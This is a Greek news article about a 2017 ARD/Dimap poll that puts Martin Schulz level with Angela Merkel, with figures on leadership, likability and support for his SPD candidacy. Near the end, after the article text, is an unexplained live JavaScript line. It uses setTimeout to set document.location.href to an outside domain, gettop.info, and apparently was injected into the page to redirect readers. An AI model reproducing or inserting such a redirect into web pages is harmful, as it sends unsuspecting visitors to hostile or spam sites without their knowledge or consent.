Δημοσκόπηση: «Στήθος» με «στήθος» Σουλτς και Μέρκελ

Πολύ θετικά είναι τα πρώτα δημοσκοπικά στοιχεία για τον Μάρτιν Σουλτς που θα «κονταροχτυπηθεί» με την νυν καγκελάριο Άνγκελα Μέρκελ στις εκλογές του Σεπτεμβρίου.

Εάν ο καγκελάριος εκλεγόταν άμεσα από τον λαό και υπήρχαν δύο υποψήφιοι θα ελάμβανε το 41%, όσο δηλαδή και η Μέρκελ, σύμφωνα με τη δημοσκόπηση που διεξήγαγε η εταιρεία «Dimap» για λογαριασμό του πρώτου γερμανικού δημόσιου ραδιοτηλεοπτικού δικτύου ARD. Αυτό σημαίνει -2% για την νυν καγκελάριο και +5% για τον Μάρτιν Σουλτς σε σχέση με την ανάλογη δημοσκόπηση του Δεκεμβρίου 2016. Μόνο το 11% δεν θα ψήφιζε κανέναν εκ των δύο.

Το 79% των πολιτών θεωρεί ότι η κα Μέρκελ διαθέτει ηγετικές ικανότητες, ενώ για τον κ. Σουλτς το πιστεύει το 60%. Επίσης το 78% θεωρεί ότι η κ. Μέρκελ έχει τις απαιτούμενες ικανότητες για το αξίωμα, ενώ για τον Σουλτς το πιστεύει το 68%. Αξιόπιστη θεωρεί την κ. Μέρκελ το 64%, ενώ τον κ. Σουλτς το 65%.

Συμπαθή βρίσκει την νυν καγκελάριο το 63%, (το αντίστοιχο ποσοστό για τον Σουλτς είναι 69%).

Ειδικότερα, το 64% των Γερμανών πολιτών τάσσεται υπέρ της υποψηφιότητας του Σοσιαλδημοκράτη πρώην πρόεδρου του Ευρωπαϊκού Κοινοβουλίου, ενώ μόνο το 14% είναι κατά. Οι ψηφοφόροι, μάλιστα, του Σοσιαλδημοκρατικού κόμματος (SPD) τάσσονται υπέρ σε ποσοστό 81%, ενώ μόνο το 4% είναι εναντίον.

 

 

Επίσης το 79% των ερωτηθέντων κρίνει ορθή την απόφαση του προέδρου του SPD Ζίγκμαρ Γκάμπριελ να προτείνει τον Μάρτιν Σουλτς για υποψήφιο καγκελάριο, το δε 69% πιστεύει ότι το SPD θα καταφέρει να κάνει μια νέα αρχή μαζί του. Οι ψηφοφόροι του κόμματός του το πιστεύουν σε ποσοστό 85%. Το 51% όλων των ερωτηθέντων έχει τη γνώμη ότι ο κ. Σουλτς διαθέτει το αισθητήριο να αντιληφθεί τις αγωνίες του κόσμου.

 

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

Σχετικά Άρθρα


Αφήστε το σχόλιο σας

*